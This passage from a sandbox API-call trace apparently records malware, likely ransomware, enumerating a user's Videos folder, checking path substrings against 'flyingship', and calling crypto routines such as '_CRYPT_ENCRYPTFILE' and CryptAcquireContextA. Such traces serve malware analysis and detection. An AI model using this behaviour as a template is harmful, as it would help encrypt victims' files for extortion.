lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf297f770, ftCreationTime.dwHighDateTime=0x1d5e569, ftLastAccessTime.dwLowDateTime=0x9fa1c510, ftLastAccessTime.dwHighDateTime=0x1d5e239, ftLastWriteTime.dwLowDateTime=0x9fa1c510, ftLastWriteTime.dwHighDateTime=0x1d5e239, nFileSizeHigh=0x0, nFileSizeLow=0x7678, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="jyvwvjYdk6QKt4.mkv", cAlternateFileName="JYVWVJ~1.MKV")) returned 0x90add8 [0197.307] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.307] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mgGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gGtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GtzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tzCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zCZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CZzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zzg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zg\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jyvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yvwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vwvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wvjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vjYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jYdk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ydk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dk6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6QKt4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.310] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.310] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0197.310] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.310] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.311] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.333] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.333] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.333] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.333] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.333] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf297f770, ftCreationTime.dwHighDateTime=0x1d5e569, ftLastAccessTime.dwLowDateTime=0x9fa1c510, ftLastAccessTime.dwHighDateTime=0x1d5e239, ftLastWriteTime.dwLowDateTime=0x9fa1c510, ftLastWriteTime.dwHighDateTime=0x1d5e239, nFileSizeHigh=0x0, nFileSizeLow=0x7678, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="jyvwvjYdk6QKt4.mkv", cAlternateFileName="JYVWVJ~1.MKV")) returned 0x90af58 [0197.334] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0197.334] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.334] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.334] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.334] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0197.334] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.334] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0197.335] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.335] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.335] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0197.335] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.335] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.335] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.335] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.335] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.335] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0197.335] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.335] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0197.336] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.336] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.336] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0197.337] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.337] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.337] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.337] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.337] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.337] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.337] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.337] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.337] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.337] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 